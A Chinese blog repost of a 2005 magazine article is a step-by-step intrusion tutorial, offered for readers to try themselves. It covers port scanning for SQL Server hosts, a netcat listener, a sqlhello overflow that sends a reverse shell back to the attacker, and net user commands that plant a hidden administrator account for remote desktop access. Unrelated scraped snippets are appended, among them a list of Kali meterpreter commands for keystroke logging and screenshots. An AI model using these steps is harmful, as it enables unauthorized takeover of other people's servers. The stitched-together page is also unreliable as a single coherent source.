「肉雞」是這樣獲得的

2021-04-01 23:21:26 字數 2128 閱讀 5313

「肉雞」是這樣獲得的

文/圖 溫鵬

現代計算機總第貳貳零期  [

2005-10-5

]乙個月黑風高的夜晚,筆者端莊文雅地坐在電腦旁前,看著螢幕閃爍出的入侵資訊,時不時地嘴角露出微笑,又成功地抓取了乙隻「肉雞」。

小知識:什麼叫「肉雞」

肉雞是指在網路上,已經被你成功入侵的主機,並且這台機器完全受控於入侵者的任意操作,如同本機操控一樣的直觀順手。但是對於網路「肉雞」的抓取,大家可以利用ipc$特殊共享的漏洞,來遠端建立空連線,並使用上傳、執行的命令,啟用該木馬的服務端,即可使此機「搖身」變為肉雞。

下面筆者為感興趣的朋友演示一下如何獲得「肉雞」,本次入侵進入的主機是裝有sql資料庫程式的伺服器。如果讀者想按筆者的方法去體驗抓雞樂趣,首先需找尋一台裝有該程式的資料庫。找尋方法:隨意挑選一款掃瞄埠軟體,將掃瞄的1433、3389埠勾選上。然後在開始掃瞄所設立的ip段。不一會,提示資訊中所出現的ip,就是裝有sql程式的主機。

● 天羅地網——監聽本機埠資訊

第一步:執行nc工具,單擊「開始」選單,選擇「執行」標籤,會出現「執行」對話方塊。在「開啟」標籤處輸入cmd命令,然後敲擊「回車」鍵。在彈出的命令窗體中,將目錄跳轉到nc軟體所在的位置。

第二步:在命令列處輸入「nc-vv-l-p

1987

」的命令,然後敲擊「回車」鍵,即可實現對本機1987

埠的監聽(圖1)。

小提示:nc軟體裡的-vv引數代表,得到更詳細的輸入監聽內容。-l代表連線埠關閉後,仍然繼續監聽。-p進行監聽本地埠,後跟數字就是所要監聽的埠號。

● 趕兔撞樹——溢位攻擊

「天羅地網」已經布置妥當,就等肉雞來訪。不過守株待兔自然不是聰明之舉,所以需要我們牽引著小白兔來撞樹。這裡筆者編寫了乙個批處理檔案,將sqlhello的溢位命令放置在其中,然後配合該工具的使用,實現溢位攻擊,讓肉雞自投羅網。具體方法如下:

第一步

第二步:右擊解壓出來的1.bat檔案,選擇「編輯」選項,在彈出的記事文本內容處,輸入命令sqlhello 溢位ip位址1433埠本機ip 監聽埠(圖2)。操作完畢後,單擊「檔案」選單,選擇「儲存」選項,然後再將此視窗關閉即可。

小提示:解壓出來的1.bat檔案,是用來執行sqlhello程式溢位的,所以大家可以按著上述批處理檔案中的內容,照貓畫虎地替換想要溢位、反向連線的ip。

第三步:雙擊剛才關閉的1.bat檔案,螢幕頓時閃過執行命令的窗體,可見批處理檔案,指揮sqlhello溢位程式已經開始執行。這時切換到nc命令監聽窗體,你會發現已經獲取了對方的shell(圖3),接下來在此遠端shell平台中,敲入net user wenpeng 123456 /add的命令,將其「wenpeng」使用者名稱新增到遠端主機中。

第四步:然後使用net user administrators wenpeng /add的命令,將其wenpeng這位使用者提公升為遠端管理員,最後使用本機自帶的遠端終端軟體,敲入剛才所提公升、建立的使用者進入,即可遠端**到肉雞桌面(圖4)。

小提示:當入侵者拿到遠端主機的管理員許可權,便可以隨意遠端操控該機器。在肉雞中得到shell是作業系統的最外層,管理著你與作業系統互動、通訊、執行等工作的操作,假設你已經得到了對方的shell,也就代表著你擁有了與對方計算機直接溝通、下達命令的權力。

獲取肉雞就這麼簡單。當然,在實際操作時,還會碰到不同的情況與問題,要戰勝它們就需要知識與經驗的積累了。

北京是這樣的

北京是乙個三十歲沒結婚都不嫌晚的地方 北京是乙個你在馬路上大吼一聲卻無人理睬的地方 北京是乙個被人騙又去騙別人的地方 北京是乙個讓你時刻在受傷卻不得不強裝堅強的地方 北京是乙個靠打工仔打工妹建設起來,卻不讓他們享有社會福利的地方。北京是乙個初次見面第一句問你是 人,第二句問你來北京多久了的地方。北京...

kali 肉雞的操作

1.螢幕截圖 命令 screenshot 2.鍵盤記錄 命令 keyscan start 開啟 keyscan dump 顯示鍵盤記錄 keyscan stop 關閉鍵盤記錄 3.結束程序 命令 kill 程序 4.檢視程序 命令 ps 5.重啟電腦 命令 reboot 6.關閉電腦 命令 shut...

流量是這樣提高的

1.你的部落格要有內容盡可能做到獨一無二.當來訪者訪問你的站的時候,你首先要給來訪者第乙個好印象,讓他們感覺你的站有內容,很獨特,值得一看,這樣他們才會繼續看別的文章,甚至收藏你的站.平衡計分卡 2.有乙個簡單容易記住的網域名稱與部落格標題.乙個好部落格首先要有個簡單容易記住的網域名稱,這樣大家才會...